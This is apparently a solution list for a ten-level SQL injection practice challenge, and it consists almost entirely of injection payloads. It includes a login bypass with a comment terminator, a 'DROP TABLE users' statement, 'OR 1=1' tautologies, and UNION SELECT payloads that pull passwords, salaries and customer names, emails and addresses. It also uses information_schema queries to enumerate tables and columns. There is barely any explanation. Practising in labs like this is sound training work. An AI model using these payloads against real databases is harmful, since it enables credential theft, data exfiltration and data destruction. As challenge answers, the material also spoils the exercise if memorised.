Note: The first ' in each payload below is not part of the injected text; it is only there for syntax highlighting.
Level 1
'jane';--
Level 2
''; DROP TABLE users;--
Level 3
'' OR 1=1; --
Level 4
'' OR 1=1 LIMIT 1;--
Level 5
'' UNION SELECT password, username FROM users;--
Level 6
'' UNION
SELECT salary FROM staff
WHERE firstname LIKE '%_reta%'
LIMIT 1 OFFSET 0;--
Get table metadata
- Get table names
'' UNION SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 0;--
- Get columns of table
'' UNION SELECT column_name FROM information_schema.columns WHERE table_name='staff' LIMIT 1 OFFSET 0;--
Level 7
'' UNION
SELECT name, email, salary, employed_since
FROM staff--
Level 8
'' UNION
SELECT table_name, table_type, table_rows
FROM information_schema.tables--
Level 9
'' UNION
SELECT table_name, column_name, data_type
FROM information_schema.columns
WHERE table_name='customers'--
Level 10
product_id=null UNION
SELECT address, name, email
FROM customers
WHERE customer_id=3